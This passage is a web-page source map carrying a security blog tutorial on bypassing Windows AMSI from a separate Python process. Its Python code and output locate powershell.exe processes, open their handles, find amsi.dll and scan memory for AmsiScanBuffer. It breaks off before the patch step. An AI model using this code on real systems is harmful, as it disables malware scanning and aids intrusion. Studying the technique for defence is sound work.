{"version":3,"file":"WJBZI1Ghk-59.DbcF3yyT.mjs","names":["n","s","o","a"],"sources":["https:/framerusercontent.com/modules/xkgOTPH3D819XQA1Lv94/f7EzDt54JfBX9aTXubsh/WJBZI1Ghk-59.js"],"sourcesContent":["import{jsx as e,jsxs as t}from\"react/jsx-runtime\";import{ComponentPresetsConsumer as n,Link as o}from\"framer\";import{motion as a}from\"framer-motion\";import*as r from\"react\";import s from\"https://framerusercontent.com/modules/pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js\";export const richText=/*#__PURE__*/t(r.Fragment,{children:[/*#__PURE__*/e(\"h2\",{children:\"Strategy\"}),/*#__PURE__*/t(\"p\",{children:[\"We can't use the same strategy for patching AMSI if we want to make it outside the \",/*#__PURE__*/e(\"code\",{children:\"powershell.exe\"}),\" process. Win32 API functions like \",/*#__PURE__*/e(\"code\",{children:\"LoadLibrary()\"}),\", \",/*#__PURE__*/e(\"code\",{children:\"GetModuleHandleA()\"}),\" and \",/*#__PURE__*/e(\"code\",{children:\"GetProcAddress()\"}),\" only work in the context of the calling process. As we will create a whole new Python process, we need to find another way. So, as a general strategy we need to do the following:\"]}),/*#__PURE__*/t(\"ol\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"Get the \",/*#__PURE__*/e(\"code\",{children:\"PID\"}),\" of running \",/*#__PURE__*/e(\"code\",{children:\"powershell.exe\"}),\" processes.\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Get a handle to the processes.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"Get the loaded modules of the \",/*#__PURE__*/e(\"code\",{children:\"powershell.exe\"}),\" processes.\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"Find the address in memory of \",/*#__PURE__*/e(\"code\",{children:\"AmsiScanBuffer\"}),\".\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"Patch \",/*#__PURE__*/e(\"code\",{children:\"AmsiScanBuffer\"}),\".\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Profit.\"})})]}),/*#__PURE__*/e(\"h3\",{children:\"Getting the PID of powershell.exe processes\"}),/*#__PURE__*/t(\"p\",{children:[\"The first thing to do is getting the process identifiers (\",/*#__PURE__*/e(\"code\",{children:\"PID\"}),\") of any \",/*#__PURE__*/e(\"code\",{children:\"powershell.exe\"}),\" process.\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"PS C:\\\\Users\\\\aroldan> Get-Process -Name powershell\\n\\nHandles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName\\n------- ------ ----- ----- ------ -- -- -----------\\n 649 29 99504 65396 0.16 9936 1 powershell\\n 604 28 108536 73584 0.16 14580 1 powershell\\n 805 29 120644 88004 0.33 20424 1 powershell\",language:\"C#\"})})}),/*#__PURE__*/t(\"p\",{children:[\"We need to get programmatically the same results using Python. We can make it using the \",/*#__PURE__*/e(\"code\",{children:\"psutil\"}),\" module:\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"import psutil\\n\\ndef getPowershellPids():\\n ppids = [pid for pid in psutil.pids() if psutil.Process(pid).name() == 'powershell.exe']\\n return ppids\\n\\nprint(getPowershellPids())\",language:\"Python\"})})}),/*#__PURE__*/e(\"p\",{children:\"And we get:\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"PS C:\\\\Users\\\\aroldan> python3 .\\\\amsibypass.py\\n[9936, 14580, 20424]\",language:\"C#\"})})}),/*#__PURE__*/e(\"p\",{children:\"Task one done!\"}),/*#__PURE__*/e(\"h3\",{children:\"Get a handle to the processes\"}),/*#__PURE__*/e(\"p\",{children:\"Now, to be able to do something useful with those processes, we need to get a handle to them. The handle is basically an opaque interface to a kernel-managed object, a process in this case. This can be done with something like this:\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"from ctypes import *\\n\\nKERNEL32 = windll.kernel32\\nPROCESS_ACCESS = (\\n 0x000F0000 | # STANDARD_RIGHTS_REQUIRED\\n 0x00100000 | # SYNCHRONIZE\\n 0xFFFF\\n)\\nprocess_handle = KERNEL32.OpenProcess(PROCESS_ACCESS, False, pid)\",language:\"Python\"})})}),/*#__PURE__*/t(\"p\",{children:[\"The \",/*#__PURE__*/e(\"code\",{children:\"PROCESS_ACCESS\"}),\" variable was obtained from \",/*#__PURE__*/e(o,{href:\"https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"here\"})}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"Keep in mind that you can only get a handle to processes you own. Let's try to get a handle of \",/*#__PURE__*/e(\"code\",{children:\"PID\"}),\" \",/*#__PURE__*/e(\"code\",{children:\"18104\"}),\" which is run under the \",/*#__PURE__*/e(\"code\",{children:\"NT AUTHORITY\\\\LOCAL SERVICE\"}),\" user:\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"PS C:\\\\Users\\\\aroldan> Get-Process -Id 18104 -IncludeUserName | select UserName,ProcessName\\n\\nUserName ProcessName\\n-------- -----------\\nNT AUTHORITY\\\\LOCAL SERVICE svchost\",language:\"C#\"})})}),/*#__PURE__*/e(\"p\",{children:\"We will use this code:\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"from ctypes import *\\n\\nKERNEL32 = windll.kernel32\\nPROCESS_ACCESS = (\\n 0x000F0000 | # STANDARD_RIGHTS_REQUIRED\\n 0x00100000 | # SYNCHRONIZE\\n 0xFFFF\\n)\\nprocess_handle = KERNEL32.OpenProcess(PROCESS_ACCESS, False, 18104)\\nif not process_handle:\\n print(f'[-] Error: {KERNEL32.GetLastError()}')\\nelse:\\n print('[+] Got handle')\",language:\"Python\"})})}),/*#__PURE__*/e(\"p\",{children:\"Now, we run that under a non-privileged session:\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"PS C:\\\\Users\\\\aroldan> Get-Process -id 18104 -IncludeUserName\\n\\nHandles WS(K) CPU(s) Id UserName ProcessName\\n------- ----- ------ -- -------- -----------\\n 116 5844 0.00 18104 NT AUTHORITY\\\\LOCAL ... svchost\\n\\nPS C:\\\\Users\\\\aroldan> python3 .\\\\testhandle.py\\n[-] Error: 5\\n\\nPS C:\\\\Users\\\\aroldan> net helpmsg 5\\n\\nAccess is denied.\",language:\"C#\"})})}),/*#__PURE__*/t(\"p\",{children:[\"However, if the current user has the \",/*#__PURE__*/e(\"code\",{children:\"SeDebugPrivilege\"}),\" privilege enabled (local admins commonly have it), you can get a handle to other processes too:\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"> Get-Process -id 18104 -IncludeUserName\\n\\nHandles WS(K) CPU(s) Id UserName ProcessName\\n------- ----- ------ -- -------- -----------\\n 116 5844 0.00 18104 NT AUTHORITY\\\\LOCAL ... svchost\\n\\n\\nPS C:\\\\Users\\\\aroldan> whoami /priv | findstr SeDebugPrivilege\\nSeDebugPrivilege Debug programs Enabled\\nPS C:\\\\Users\\\\aroldan> python3 .\\\\testhandle.py\\n[+] Got handle\",language:\"C#\"})})}),/*#__PURE__*/e(\"h3\",{children:\"Get the loaded modules of the powershell.exe processes\"}),/*#__PURE__*/t(\"p\",{children:[\"Now that we have a handle to a \",/*#__PURE__*/e(\"code\",{children:\"powershell.exe\"}),\" process, we can perform kernel-controlled actions using the handle interface. In our case, we want to retrieve the addresses of the loaded modules to find where \",/*#__PURE__*/e(\"code\",{children:\"amsi.dll\"}),\" is loaded in the memory space of the process.\"]}),/*#__PURE__*/t(\"p\",{children:[\"One may initially think of \",/*#__PURE__*/e(\"code\",{children:\"EnumerateProcessModules()\"}),\". Let's check that with the following code:\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"import psutil\\nfrom ctypes import *\\nfrom ctypes import wintypes\\n\\nKERNEL32 = windll.kernel32\\nPSAPI = windll.PSAPI\\n\\nPROCESS_ACCESS = (\\n 0x000F0000 | # STANDARD_RIGHTS_REQUIRED\\n 0x00100000 | # SYNCHRONIZE\\n 0xFFFF\\n)\\n\\ndef getPowershellPids():\\n ppids = [pid for pid in psutil.pids() if psutil.Process(pid).name() == 'powershell.exe']\\n return ppids\\n\\nfor pid in getPowershellPids():\\n process_handle = KERNEL32.OpenProcess(PROCESS_ACCESS, False, pid)\\n if not process_handle:\\n continue\\n print(f'[+] Got process handle of PID powershell at {pid}: {hex(process_handle)}')\\n\\n lphModule = (wintypes.HMODULE * 128)()\\n needed = wintypes.LPDWORD()\\n\\n PSAPI.EnumProcessModules(process_handle, lphModule, len(lphModule), byref(needed))\\n modules = [module for module in lphModule if module]\\n\\n KERNEL32.GetModuleFileNameA.argtypes = [c_void_p, c_char_p, c_ulong]\\n for module in modules:\\n cPath = c_buffer(128)\\n KERNEL32.GetModuleFileNameA(module, cPath, sizeof(cPath))\\n print(cPath.value.decode())\",language:\"Python\"})})}),/*#__PURE__*/e(\"p\",{children:\"And try it:\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"PS C:\\\\Users\\\\aroldan> python3 .\\\\enummodules.py\\n[+] Got process handle of PID powershell at 9936: 0x430\\nC:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll\\nC:\\\\WINDOWS\\\\System32\\\\KERNEL32.DLL\\nC:\\\\WINDOWS\\\\System32\\\\KERNELBASE.dll\\nC:\\\\WINDOWS\\\\System32\\\\msvcrt.dll\\nC:\\\\WINDOWS\\\\System32\\\\OLEAUT32.dll\\nC:\\\\WINDOWS\\\\System32\\\\msvcp_win.dll\\nC:\\\\WINDOWS\\\\System32\\\\ucrtbase.dll\\nC:\\\\WINDOWS\\\\System32\\\\combase.dll\\nC:\\\\WINDOWS\\\\System32\\\\USER32.dll\\nC:\\\\WINDOWS\\\\System32\\\\RPCRT4.dll\\nC:\\\\WINDOWS\\\\System32\\\\win32u.dll\\nC:\\\\WINDOWS\\\\System32\\\\ADVAPI32.dll\\nC:\\\\WINDOWS\\\\System32\\\\GDI32.dll\\nC:\\\\WINDOWS\\\\System32\\\\sechost.dll\\n[+] Got process handle of PID powershell at 20424: 0x3fc\\n...\",language:\"C#\"})})}),/*#__PURE__*/t(\"p\",{children:[\"What just happened? No signs of \",/*#__PURE__*/e(\"code\",{children:\"amsi.dll\"}),\"! Let's check it using PowerShell:\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"PS C:\\\\Users\\\\aroldan> Get-Process -PID 9936 | select -ExpandProperty Modules | select fileName\\n\\nFileName\\n--------\\nC:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\nC:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll\\nC:\\\\WINDOWS\\\\System32\\\\KERNEL32.DLL\\nC:\\\\WINDOWS\\\\System32\\\\KERNELBASE.dll\\nC:\\\\WINDOWS\\\\System32\\\\msvcrt.dll\\nC:\\\\WINDOWS\\\\System32\\\\OLEAUT32.dll\\nC:\\\\WINDOWS\\\\System32\\\\msvcp_win.dll\\nC:\\\\WINDOWS\\\\System32\\\\ucrtbase.dll\\nC:\\\\WINDOWS\\\\SYSTEM32\\\\ATL.DLL\\nC:\\\\WINDOWS\\\\System32\\\\combase.dll\\nC:\\\\WINDOWS\\\\System32\\\\USER32.dll\\nC:\\\\WINDOWS\\\\System32\\\\RPCRT4.dll\\nC:\\\\WINDOWS\\\\System32\\\\win32u.dll\\nC:\\\\WINDOWS\\\\System32\\\\ADVAPI32.dll\\nC:\\\\WINDOWS\\\\System32\\\\GDI32.dll\\nC:\\\\WINDOWS\\\\System32\\\\sechost.dll\\nC:\\\\WINDOWS\\\\System32\\\\gdi32full.dll\\nC:\\\\WINDOWS\\\\System32\\\\OLE32.dll\\nC:\\\\WINDOWS\\\\SYSTEM32\\\\mscoree.dll\\nC:\\\\WINDOWS\\\\System32\\\\IMM32.DLL\\nC:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\mscoreei.dll\\nC:\\\\WINDOWS\\\\System32\\\\SHLWAPI.dll\\nC:\\\\WINDOWS\\\\SYSTEM32\\\\kernel.appcore.dll\\nC:\\\\WINDOWS\\\\SYSTEM32\\\\VERSION.dll\\nC:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\clr.dll\\nC:\\\\WINDOWS\\\\SYSTEM32\\\\VCRUNTIME140_1_CLR0400.dll\\nC:\\\\WINDOWS\\\\SYSTEM32\\\\ucrtbase_clr0400.dll\\nC:\\\\WINDOWS\\\\SYSTEM32\\\\VCRUNTIME140_CLR0400.dll\\nC:\\\\WINDOWS\\\\System32\\\\psapi.dll\\nC:\\\\WINDOWS\\\\assembly\\\\NativeImages_v4.0.30319_64\\\\mscorlib\\\\5b8c945e30aa4099a8c0741d874b8f36\\\\mscorlib.ni.dll\\nC:\\\\WINDOWS\\\\System32\\\\bcryptPrimitives.dll\\nC:\\\\WINDOWS\\\\assembly\\\\NativeImages_v4.0.30319_64\\\\System\\\\a8c3a8bedc935407a7f5f21e97aa1003\\\\System.ni.dll\\nC:\\\\WINDOWS\\\\assembly\\\\NativeImages_v4.0.30319_64\\\\System.Core\\\\8819bf9c3cfd5f3086be099fc8d43355\\\\System.Core.ni.dll\\nC:\\\\WINDOWS\\\\assembly\\\\NativeImages_v4.0.30319_64\\\\Microsoft.Pb378ec07#\\\\8e2fdb14b0a3b4f83fc612f5d2dc52b2\\\\Microsoft.Power...\\nC:\\\\WINDOWS\\\\SYSTEM32\\\\CRYPTSP.dll\\nC:\\\\WINDOWS\\\\system32\\\\rsaenh.dll\\nC:\\\\WINDOWS\\\\SYSTEM32\\\\CRYPTBASE.dll\\nC:\\\\WINDOWS\\\\SYSTEM32\\\\bcrypt.dll\\nC:\\\\WINDOWS\\\\assembly\\\\NativeImages_v4.0.30319_64\\\\System.Manaa57fc8cc#\\\\7929a7b72d26707339cddb9177ddcb48\\\\System.Manageme...\\nC:\\\\WINDOWS\\\\System32\\\\clbcatq.dll\\nC:\\\\WINDOWS\\\\System32\\\\shell32.dll\\nC:\\\\WINDOWS\\\\SYSTEM32\\\\amsi.dll\\n...\",language:\"C#\"})})}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"amsi.dll\"}),\" is there, but also a bunch of other modules. The difference is huge!\"]}),/*#__PURE__*/t(\"p\",{children:[\"After a while (and by RTFM), I found that \",/*#__PURE__*/e(\"code\",{children:\"EnumProcessModules()\"}),\" only retrieves the modules that are part of the \",/*#__PURE__*/e(\"code\",{children:\"IAT\"}),\" (Import Address Table) or related modules. If somewhere in the middle there's a dynamic loading of another module by using \",/*#__PURE__*/e(\"code\",{children:\"LoadLibraryEx()\"}),\" or something similar, \",/*#__PURE__*/e(\"code\",{children:\"EnumProcessModules()\"}),\" won't give accurate results.\"]}),/*#__PURE__*/t(\"p\",{children:[\"After a little research, I found that the way to get all the loaded modules of a running process was using \",/*#__PURE__*/e(\"code\",{children:\"CreateToolhelp32Snapshot()\"}),\", which creates a snapshot of a process, including heaps, modules and threads. We can use that API to get the loaded modules along with the resolved base address of each module in the process memory. Let's check that with the following code:\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"import psutil\\nfrom ctypes import *\\n\\n\\nKERNEL32 = windll.kernel32\\nPSAPI = windll.PSAPI\\n\\nPROCESS_ACCESS = (\\n 0x000F0000 | # STANDARD_RIGHTS_REQUIRED\\n 0x00100000 | # SYNCHRONIZE\\n 0xFFFF\\n)\\n\\ndef getPowershellPids():\\n ppids = [pid for pid in psutil.pids() if psutil.Process(pid).name() == 'powershell.exe']\\n return ppids\\n\\nfor pid in getPowershellPids():\\n process_handle = KERNEL32.OpenProcess(PROCESS_ACCESS, False, pid)\\n if not process_handle:\\n continue\\n print(f'[+] Got process handle of PID powershell at {pid}: {hex(process_handle)}')\\n\\n MAX_PATH = 260\\n MAX_MODULE_NAME32 = 255\\n TH32CS_SNAPMODULE = 0x00000008\\n class MODULEENTRY32(Structure):\\n _fields_ = [ ('dwSize', c_ulong) ,\\n ('th32ModuleID', c_ulong),\\n ('th32ProcessID', c_ulong),\\n ('GlblcntUsage', c_ulong),\\n ('ProccntUsage', c_ulong) ,\\n ('modBaseAddr', c_size_t) ,\\n ('modBaseSize', c_ulong) ,\\n ('hModule', c_void_p) ,\\n ('szModule', c_char * (MAX_MODULE_NAME32+1)),\\n ('szExePath', c_char * MAX_PATH)]\\n\\n me32 = MODULEENTRY32()\\n me32.dwSize = sizeof(MODULEENTRY32)\\n snapshotHandle = KERNEL32.CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, pid)\\n ret = KERNEL32.Module32First(snapshotHandle, pointer(me32))\\n while ret:\\n print(f'[+] Got module: {me32.szModule.decode()} loaded at {hex(me32.modBaseAddr)}')\\n ret = KERNEL32.Module32Next(snapshotHandle , pointer(me32))\\n\",language:\"Python\"})})}),/*#__PURE__*/e(\"p\",{children:\"And run it:\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"PS C:\\\\Users\\\\aroldan> python3 .\\\\enummodules.py\\n[+] Got process handle of PID powershell at 21580: 0x410\\n[+] Got module: powershell.exe loaded at 0x7ff6eded0000\\n[+] Got module: ntdll.dll loaded at 0x7ffd5c1b0000\\n[+] Got module: KERNEL32.DLL loaded at 0x7ffd5a1c0000\\n[+] Got module: KERNELBASE.dll loaded at 0x7ffd59a60000\\n[+] Got module: msvcrt.dll loaded at 0x7ffd5b820000\\n[+] Got module: OLEAUT32.dll loaded at 0x7ffd5a3b0000\\n[+] Got module: msvcp_win.dll loaded at 0x7ffd59e00000\\n[+] Got module: ucrtbase.dll loaded at 0x7ffd59750000\\n[+] Got module: ATL.DLL loaded at 0x7ffd288a0000\\n[+] Got module: combase.dll loaded at 0x7ffd5a490000\\n[+] Got module: USER32.dll loaded at 0x7ffd5aa70000\\n[+] Got module: RPCRT4.dll loaded at 0x7ffd5ace0000\\n[+] Got module: win32u.dll loaded at 0x7ffd59600000\\n[+] Got module: GDI32.dll loaded at 0x7ffd5a9b0000\\n[+] Got module: ADVAPI32.dll loaded at 0x7ffd5ac20000\\n[+] Got module: gdi32full.dll loaded at 0x7ffd59630000\\n[+] Got module: sechost.dll loaded at 0x7ffd5a820000\\n[+] Got module: OLE32.dll loaded at 0x7ffd5b680000\\n[+] Got module: mscoree.dll loaded at 0x7ffd47ef0000\\n[+] Got module: IMM32.DLL loaded at 0x7ffd5bf00000\\n[+] Got module: mscoreei.dll loaded at 0x7ffd44de0000\\n[+] Got module: SHLWAPI.dll loaded at 0x7ffd59fd0000\\n[+] Got module: kernel.appcore.dll loaded at 0x7ffd58670000\\n[+] Got module: VERSION.dll loaded at 0x7ffd514f0000\\n[+] Got module: clr.dll loaded at 0x7ffd37be0000\\n[+] Got module: VCRUNTIME140_1_CLR0400.dll loaded at 0x7ffd53b60000\\n[+] Got module: VCRUNTIME140_CLR0400.dll loaded at 0x7ffd51640000\\n[+] Got module: ucrtbase_clr0400.dll loaded at 0x7ffd44d10000\\n[+] Got module: psapi.dll loaded at 0x7ffd5a030000\\n[+] Got module: mscorlib.ni.dll loaded at 0x7ffd35840000\\n[+] Got module: bcryptPrimitives.dll loaded at 0x7ffd59870000\\n[+] Got module: System.ni.dll loaded at 0x7ffd34c20000\\n[+] Got module: System.Core.ni.dll loaded at 0x7ffd33290000\\n[+] Got module: Microsoft.PowerShell.ConsoleHost.ni.dll loaded at 0x7ffd18290000\\n[+] Got module: CRYPTSP.dll loaded at 0x7ffd58d20000\\n[+] Got module: rsaenh.dll loaded at 0x7ffd585e0000\\n[+] Got module: CRYPTBASE.dll loaded at 0x7ffd58d40000\\n[+] Got module: bcrypt.dll loaded at 0x7ffd58ec0000\\n[+] Got module: System.Management.Automation.ni.dll loaded at 0x7ffcecb60000\\n[+] Got module: clbcatq.dll loaded at 0x7ffd5b9d0000\\n[+] Got module: shell32.dll loaded at 0x7ffd5ae70000\\n[+] Got module: amsi.dll loaded at 0x7ffd4c270000\\n...\",language:\"C#\"})})}),/*#__PURE__*/e(\"p\",{children:\"Much better!\"}),/*#__PURE__*/e(\"h3\",{children:\"Find the address in memory of AmsiScanBuffer\"}),/*#__PURE__*/t(\"p\",{children:[\"As we saw in our \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/amsi-bypass/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"previous post\"})}),\", \",/*#__PURE__*/e(\"code\",{children:\"AmsiScanBuffer\"}),\" is the function which is the interface between the AMSI-hooked process and the underlying EDR.\"]}),/*#__PURE__*/e(\"p\",{children:\"The function prologue can be seen under a debugger:\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"0:010> u amsi!AmsiScanBuffer\\namsi!AmsiScanBuffer:\\n00007ffd`4c278260 4c8bdc mov r11,rsp\\n00007ffd`4c278263 49895b08 mov qword ptr [r11+8],rbx\\n00007ffd`4c278267 49896b10 mov qword ptr [r11+10h],rbp\\n00007ffd`4c27826b 49897318 mov qword ptr [r11+18h],rsi\\n00007ffd`4c27826f 57 push rdi\\n00007ffd`4c278270 4156 push r14\\n00007ffd`4c278272 4157 push r15\\n00007ffd`4c278274 4883ec70 sub rsp,70h\",language:\"C#\"})})}),/*#__PURE__*/t(\"p\",{children:[\"Using the opened handle, we need to find those instructions in the memory of the \",/*#__PURE__*/e(\"code\",{children:\"powershell.exe\"}),\" process.\"]}),/*#__PURE__*/e(\"p\",{children:\"First, we need to write down those bytes in a variable:\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"AmsiScanBuffer = (\\n b'\\\\x4c\\\\x8b\\\\xdc' + # mov r11,rsp\\n b'\\\\x49\\\\x89\\\\x5b\\\\x08' + # mov qword ptr [r11+8],rbx\\n b'\\\\x49\\\\x89\\\\x6b\\\\x10' + # mov qword ptr [r11+10h],rbp\\n b'\\\\x49\\\\x89\\\\x73\\\\x18' + # mov qword ptr [r11+18h],rsi\\n b'\\\\x57' + # push rdi\\n b'\\\\x41\\\\x56' + # push r14\\n b'\\\\x41\\\\x57' + # push r15\\n b'\\\\x48\\\\x83\\\\xec\\\\x70' # sub rsp,70h\\n)\",language:\"Python\"})})}),/*#__PURE__*/t(\"p\",{children:[\"Then, using the discovered base address of \",/*#__PURE__*/e(\"code\",{children:\"amsi.dll\"}),\", we need to iterate over the memory of the process trying to find those instructions. To do that, I created the following function:\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"def readBuffer(handle, baseAddress, AmsiScanBuffer):\\n KERNEL32.ReadProcessMemory.argtypes = [c_ulong, c_void_p, c_void_p, c_ulong, c_int]\\n while True:\\n lpBuffer = create_string_buffer(b'', len(AmsiScanBuffer))\\n nBytes = c_int(0)\\n KERNEL32.ReadProcessMemory(handle, baseAddress, lpBuffer, len(lpBuffer), nBytes)\\n if lpBuffer.value == AmsiScanBuffer:\\n return baseAddress\\n else:\\n baseAddress += 1\",language:\"Python\"})})}),/*#__PURE__*/t(\"p\",{children:[\"The function will take the handle of the \",/*#__PURE__*/e(\"code\",{children:\"powershell.exe\"}),\" process, the base address of \",/*#__PURE__*/e(\"code\",{children:\"amsi.dll\"}),\" and the \",/*#__PURE__*/e(\"code\",{children:\"AmsiScanBuffer\"}),\" function prologue opcodes and will increment the addresses by 1 until the pattern is matched.\"]}),/*#__PURE__*/e(\"p\",{children:\"The relevant part of the script was updated:\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"...\\nsnapshotHandle = KERNEL32.CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, pid)\\nret = KERNEL32.Module32First(snapshotHandle, pointer(me32))\\nwhile ret:\\n if me32.szModule == b'amsi.dll':\\n print(f'[+] Found base address of {me32.szModule.decode()}: {hex(me32.modBaseAddr)}')\\n KERNEL32.CloseHandle(snapshotHandle)\\n amsiDllBaseAddress = me32.modBaseAddr\\n break\\n else:\\n ret = KERNEL32.Module32Next(snapshotHandle , pointer(me32))\\nAmsiScanBuffer = (\\n b'\\\\x4c\\\\x8b\\\\xdc' + # mov r11,rsp\\n b'\\\\x49\\\\x89\\\\x5b\\\\x08' + # mov qword ptr [r11+8],rbx\\n b'\\\\x49\\\\x89\\\\x6b\\\\x10' + # mov qword ptr [r11+10h],rbp\\n b'\\\\x49\\\\x89\\\\x73\\\\x18' + # mov qword ptr [r11+18h],rsi\\n b'\\\\x57' + # push rdi\\n b'\\\\x41\\\\x56' + # push r14\\n b'\\\\x41\\\\x57' + # push r15\\n b'\\\\x48\\\\x83\\\\xec\\\\x70' # sub rsp,70h\\n)\\namsiScanBufferAddress = readBuffer(process_handle, amsiDllBaseAddress, AmsiScanBuffer)\\nprint(f'[+] Address of AmsiScanBuffer found at 